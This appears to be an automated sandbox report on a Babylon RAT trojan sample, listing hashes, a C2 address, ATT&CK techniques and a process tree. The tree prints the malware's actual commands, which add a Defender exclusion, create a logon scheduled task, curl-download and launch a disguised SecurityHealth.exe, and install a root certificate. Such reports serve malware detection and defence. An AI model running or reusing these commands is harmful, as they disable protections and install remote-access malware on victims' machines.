babylonrat | 82d7f059608bbf6bf8112dfaa2cfae570b4fa68aa56f3b48cd3673212fa19c52

General

Target

2024-06-26_4c7afbccecb19ce4ed453f9c65fd36f1_poet-rat_snatch.exe
Size

4.8MB
MD5

4c7afbccecb19ce4ed453f9c65fd36f1
SHA1

42bea032c04be5ad23ee33209d710365afbaba62
SHA256

82d7f059608bbf6bf8112dfaa2cfae570b4fa68aa56f3b48cd3673212fa19c52
SHA512

914dd71f49e12d2c3f1928903c4903af0b40d3b50f7e7be313b8923a91bf6b6f544be6b100f8a20c709275612d21a5f898e4b6bb60cc70903f1559606c956d46
SSDEEP

49152:1ur1PwvIyeo+j+E5p9vTiOHWdC9hHbxCM5Ems3pQMLxA7y:qVo+jXJzWdC9lXEmBMN3

Score

10^/10

babylonrat execution trojan

Malware Config

Extracted

Family

babylonrat

C2

147.185.221.20

Signatures

Babylon RAT
Babylon RAT is remote access trojan written in C++.
trojan babylonrat

Detects executables containing SQL queries to confidential data stores. Observed in infostealers 1 IoCs

Processes:

resource	yara_rule
C:\ProgramData\Microsoft\Security\SecurityHealth.exe	INDICATOR_SUSPICIOUS_EXE_SQLQuery_ConfidentialDataStore

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

3260 powershell.exe
5060 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 2 IoCs

Processes:

svc-host.exeSecurityHealth.exe

pid process

3100 svc-host.exe
1820 SecurityHealth.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

18 raw.githubusercontent.com
19 raw.githubusercontent.com
29 raw.githubusercontent.com

pid	process
3100	svc-host.exe
1820	SecurityHealth.exe

flow	ioc
18	raw.githubusercontent.com
19	raw.githubusercontent.com
29	raw.githubusercontent.com

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

2024-06-26_4c7afbccecb19ce4ed453f9c65fd36f1_poet-rat_snatch.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C	2024-06-26_4c7afbccecb19ce4ed453f9c65fd36f1_poet-rat_snatch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0400000001000000100000003e455215095192e1b75d379fb187298a0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c99140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b9992367f000000010000000c000000300a06082b060105050703097a000000010000000c000000300a06082b060105050703097e00000001000000080000000000042beb77d501030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c190000000100000010000000a823b4a20180beb460cab955c24d7e21200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	2024-06-26_4c7afbccecb19ce4ed453f9c65fd36f1_poet-rat_snatch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 5c000000010000000400000000080000190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c7e00000001000000080000000000042beb77d5017a000000010000000c000000300a06082b060105050703097f000000010000000c000000300a06082b060105050703091d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c990b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b060105050703080f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d0400000001000000100000003e455215095192e1b75d379fb187298a200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	2024-06-26_4c7afbccecb19ce4ed453f9c65fd36f1_poet-rat_snatch.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exe

pid process

2376 schtasks.exe

pid	process
2376	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exesvc-host.exepowershell.exe

pid	process
3260	powershell.exe
3260	powershell.exe
3100	svc-host.exe
3100	svc-host.exe
5060	powershell.exe
5060	powershell.exe
3100	svc-host.exe
3100	svc-host.exe
3100	svc-host.exe
3100	svc-host.exe
3100	svc-host.exe
3100	svc-host.exe
3100	svc-host.exe
3100	svc-host.exe
3100	svc-host.exe
3100	svc-host.exe
3100	svc-host.exe
3100	svc-host.exe
3100	svc-host.exe
3100	svc-host.exe
3100	svc-host.exe
3100	svc-host.exe
3100	svc-host.exe
3100	svc-host.exe
3100	svc-host.exe
3100	svc-host.exe
3100	svc-host.exe
3100	svc-host.exe
3100	svc-host.exe
3100	svc-host.exe
3100	svc-host.exe
3100	svc-host.exe
3100	svc-host.exe
3100	svc-host.exe
3100	svc-host.exe
3100	svc-host.exe
3100	svc-host.exe
3100	svc-host.exe
3100	svc-host.exe
3100	svc-host.exe
3100	svc-host.exe
3100	svc-host.exe
3100	svc-host.exe
3100	svc-host.exe
3100	svc-host.exe
3100	svc-host.exe
3100	svc-host.exe
3100	svc-host.exe
3100	svc-host.exe
3100	svc-host.exe
3100	svc-host.exe
3100	svc-host.exe
3100	svc-host.exe
3100	svc-host.exe
3100	svc-host.exe
3100	svc-host.exe
3100	svc-host.exe
3100	svc-host.exe
3100	svc-host.exe
3100	svc-host.exe
3100	svc-host.exe
3100	svc-host.exe
3100	svc-host.exe
3100	svc-host.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

SecurityHealth.exe

pid process

1820 SecurityHealth.exe

pid	process
1820	SecurityHealth.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

powershell.exesvc-host.exepowershell.exeSecurityHealth.exe

description	pid	process
Token: SeDebugPrivilege	3260	powershell.exe
Token: SeDebugPrivilege	3100	svc-host.exe
Token: SeDebugPrivilege	5060	powershell.exe
Token: SeShutdownPrivilege	1820	SecurityHealth.exe
Token: SeDebugPrivilege	1820	SecurityHealth.exe
Token: SeTcbPrivilege	1820	SecurityHealth.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

SecurityHealth.exe

pid process

1820 SecurityHealth.exe

pid	process
1820	SecurityHealth.exe

Suspicious use of WriteProcessMemory 29 IoCs

Processes:

2024-06-26_4c7afbccecb19ce4ed453f9c65fd36f1_poet-rat_snatch.exesvc-host.execmd.execmd.execmd.exe

description	pid	process	target process
PID 1896 wrote to memory of 3260	1896	2024-06-26_4c7afbccecb19ce4ed453f9c65fd36f1_poet-rat_snatch.exe	powershell.exe
PID 1896 wrote to memory of 3260	1896	2024-06-26_4c7afbccecb19ce4ed453f9c65fd36f1_poet-rat_snatch.exe	powershell.exe
PID 1896 wrote to memory of 3100	1896	2024-06-26_4c7afbccecb19ce4ed453f9c65fd36f1_poet-rat_snatch.exe	svc-host.exe
PID 1896 wrote to memory of 3100	1896	2024-06-26_4c7afbccecb19ce4ed453f9c65fd36f1_poet-rat_snatch.exe	svc-host.exe
PID 1896 wrote to memory of 3100	1896	2024-06-26_4c7afbccecb19ce4ed453f9c65fd36f1_poet-rat_snatch.exe	svc-host.exe
PID 3100 wrote to memory of 5060	3100	svc-host.exe	powershell.exe
PID 3100 wrote to memory of 5060	3100	svc-host.exe	powershell.exe
PID 3100 wrote to memory of 5060	3100	svc-host.exe	powershell.exe
PID 3100 wrote to memory of 2376	3100	svc-host.exe	schtasks.exe
PID 3100 wrote to memory of 2376	3100	svc-host.exe	schtasks.exe
PID 3100 wrote to memory of 2376	3100	svc-host.exe	schtasks.exe
PID 3100 wrote to memory of 2004	3100	svc-host.exe	cmd.exe
PID 3100 wrote to memory of 2004	3100	svc-host.exe	cmd.exe
PID 3100 wrote to memory of 2004	3100	svc-host.exe	cmd.exe
PID 2004 wrote to memory of 3000	2004	cmd.exe	cmd.exe
PID 2004 wrote to memory of 3000	2004	cmd.exe	cmd.exe
PID 2004 wrote to memory of 3000	2004	cmd.exe	cmd.exe
PID 3000 wrote to memory of 1864	3000	cmd.exe	curl.exe
PID 3000 wrote to memory of 1864	3000	cmd.exe	curl.exe
PID 3000 wrote to memory of 1864	3000	cmd.exe	curl.exe
PID 2004 wrote to memory of 3264	2004	cmd.exe	curl.exe
PID 2004 wrote to memory of 3264	2004	cmd.exe	curl.exe
PID 2004 wrote to memory of 3264	2004	cmd.exe	curl.exe
PID 3100 wrote to memory of 3600	3100	svc-host.exe	cmd.exe
PID 3100 wrote to memory of 3600	3100	svc-host.exe	cmd.exe
PID 3100 wrote to memory of 3600	3100	svc-host.exe	cmd.exe
PID 3600 wrote to memory of 1820	3600	cmd.exe	SecurityHealth.exe
PID 3600 wrote to memory of 1820	3600	cmd.exe	SecurityHealth.exe
PID 3600 wrote to memory of 1820	3600	cmd.exe	SecurityHealth.exe

C:\Users\Admin\AppData\Local\Temp\2024-06-26_4c7afbccecb19ce4ed453f9c65fd36f1_poet-rat_snatch.exe
"C:\Users\Admin\AppData\Local\Temp\2024-06-26_4c7afbccecb19ce4ed453f9c65fd36f1_poet-rat_snatch.exe"
1⤵
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:1896
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath \"$env:programdata\""
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3260
- C:\ProgramData\Microsoft\SvcHost\svc-host.exe
  C:\ProgramData\Microsoft\SvcHost\svc-host.exe
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3100
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "%programdata%"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5060
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /Create /F /RL HIGHEST /SC ONLOGON /TN "Microsoft\Windows\SvcHost\SvcHost" /TR "cmd.exe /c start \"\" \"^%programdata^%\Microsoft\SvcHost\svc-host.exe\""
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2376
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c for /f "delims=" %i in ('curl -s https://rentry.co/o5kpirns/raw') do @curl -o "C:\ProgramData\Microsoft\Security\SecurityHealth.exe" %i 1>nul 2>&1
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2004
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c curl -s https://rentry.co/o5kpirns/raw
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3000
    - - C:\Windows\SysWOW64\curl.exe
        
        curl -s https://rentry.co/o5kpirns/raw
        5⤵
        
        PID:1864
  - - C:\Windows\SysWOW64\curl.exe
      curl -o "C:\ProgramData\Microsoft\Security\SecurityHealth.exe" https://raw.githubusercontent.com/Drelta/test/main/SecurityDiagram.txt
      4⤵
      PID:3264
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c start "" "C:\ProgramData\Microsoft\Security\SecurityHealth.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3600
  - - C:\ProgramData\Microsoft\Security\SecurityHealth.exe
      "C:\ProgramData\Microsoft\Security\SecurityHealth.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: GetForegroundWindowSpam
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      PID:1820

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4204,i,6166776566165096562,4582328833313060853,262144 --variations-seed-version --mojo-platform-channel-handle=3468 /prefetch:8
1⤵
PID:912

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Persistence

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Privilege Escalation

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Defense Evasion

Modify Registry

1

T1112

Subvert Trust Controls

1

T1553

Install Root Certificate

1

T1553.004

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Security\SecurityHealth.exe

Filesize
733KB

MD5
73a2ea546c656ceaa289f9221b6a1f59

SHA1
75ae715e21b6c2d3fb229f566a54518ac044d58b

SHA256
fa7ce16aab3ede14a4274600b3787bc66047001264da0cdeb965f231a1fd826f

SHA512
260ea61d495af5911080f268402c9be539cb8623418a71602db71e7e9933a80002c5ccaa4c29c78a60b22f0a2e773df46e0bd6f0d9f26e0e050542873e77e3a6

Download Submit
C:\ProgramData\Microsoft\SvcHost\svc-host.exe

Filesize
400KB

MD5
7d8e36e0658b87c7235d754e8ada2502

SHA1
4d16fd939eb3ec3ce3a2ad33e0c8154631de582b

SHA256
1c71376c691b2802a5809f3e0cf715e4de2611a6008bd40a3c81cecd6c77c365

SHA512
4330acd4b9365027c89237ff037529845628faee5b6693612e0f45fe77ae60c7cd68914a129d94d1718d4702a95bfec5d6741e79e896186bf104179d62fafab6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
50a8221b93fbd2628ac460dd408a9fc1

SHA1
7e99fe16a9b14079b6f0316c37cc473e1f83a7e6

SHA256
46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e

SHA512
27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jb50n4f2.pks.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/3260-1-0x000002BCD9D80000-0x000002BCD9DA2000-memory.dmp

Filesize
136KB

Download
memory/3260-11-0x00007FFF91690000-0x00007FFF92151000-memory.dmp

Filesize
10.8MB

Download
memory/3260-12-0x00007FFF91690000-0x00007FFF92151000-memory.dmp

Filesize
10.8MB

Download
memory/3260-15-0x00007FFF91690000-0x00007FFF92151000-memory.dmp

Filesize
10.8MB

Download
memory/3260-0-0x00007FFF91693000-0x00007FFF91695000-memory.dmp

Filesize
8KB

Download
memory/5060-23-0x0000000002400000-0x0000000002436000-memory.dmp

Filesize
216KB

Download
memory/5060-55-0x0000000006FC0000-0x0000000007063000-memory.dmp

Filesize
652KB

Download
memory/5060-26-0x00000000743A0000-0x0000000074B50000-memory.dmp

Filesize
7.7MB

Download
memory/5060-27-0x0000000004C60000-0x0000000004C82000-memory.dmp

Filesize
136KB

Download
memory/5060-28-0x0000000005660000-0x00000000056C6000-memory.dmp

Filesize
408KB

Download
memory/5060-29-0x00000000056D0000-0x0000000005736000-memory.dmp

Filesize
408KB

Download
memory/5060-39-0x0000000005740000-0x0000000005A94000-memory.dmp

Filesize
3.3MB

Download
memory/5060-24-0x0000000004F30000-0x0000000005558000-memory.dmp

Filesize
6.2MB

Download
memory/5060-41-0x0000000005D30000-0x0000000005D4E000-memory.dmp

Filesize
120KB

Download
memory/5060-42-0x0000000005D60000-0x0000000005DAC000-memory.dmp

Filesize
304KB

Download
memory/5060-43-0x00000000062F0000-0x0000000006322000-memory.dmp

Filesize
200KB

Download
memory/5060-44-0x00000000701C0000-0x000000007020C000-memory.dmp

Filesize
304KB

Download
memory/5060-54-0x0000000006CF0000-0x0000000006D0E000-memory.dmp

Filesize
120KB

Download
memory/5060-25-0x00000000743A0000-0x0000000074B50000-memory.dmp

Filesize
7.7MB

Download
memory/5060-56-0x00000000076F0000-0x0000000007D6A000-memory.dmp

Filesize
6.5MB

Download
memory/5060-57-0x0000000007070000-0x000000000708A000-memory.dmp

Filesize
104KB

Download
memory/5060-58-0x00000000070E0000-0x00000000070EA000-memory.dmp

Filesize
40KB

Download
memory/5060-59-0x00000000072D0000-0x0000000007366000-memory.dmp

Filesize
600KB

Download
memory/5060-60-0x0000000007260000-0x0000000007271000-memory.dmp

Filesize
68KB

Download
memory/5060-61-0x0000000007290000-0x000000000729E000-memory.dmp

Filesize
56KB

Download
memory/5060-62-0x00000000072A0000-0x00000000072B4000-memory.dmp

Filesize
80KB

Download
memory/5060-63-0x0000000007390000-0x00000000073AA000-memory.dmp

Filesize
104KB

Download
memory/5060-64-0x0000000007380000-0x0000000007388000-memory.dmp

Filesize
32KB

Download
memory/5060-67-0x00000000743A0000-0x0000000074B50000-memory.dmp

Filesize
7.7MB

Download
memory/5060-22-0x00000000743AE000-0x00000000743AF000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads